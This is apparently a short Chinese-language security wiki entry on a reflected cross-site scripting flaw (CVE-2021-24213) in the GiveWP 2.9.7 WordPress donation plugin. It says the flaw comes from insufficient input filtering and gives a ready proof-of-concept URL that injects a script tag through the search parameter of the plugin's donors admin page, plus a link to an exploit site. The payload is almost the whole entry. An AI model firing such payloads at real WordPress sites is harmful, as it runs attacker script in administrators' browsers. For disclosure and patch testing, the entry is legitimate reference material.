跳转至

WordPress GiveWP 2.9.7 反射型XSS(CVE-2021-24213)

GiveWP 是WordPress的捐赠插件,由于过滤不严导致反射型XSS漏洞.

poc:

http://localhost/wp-admin/edit.php?s=%22%3E<script>alert(0)</script>&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors

ref:

https://0day.today/exploit/36018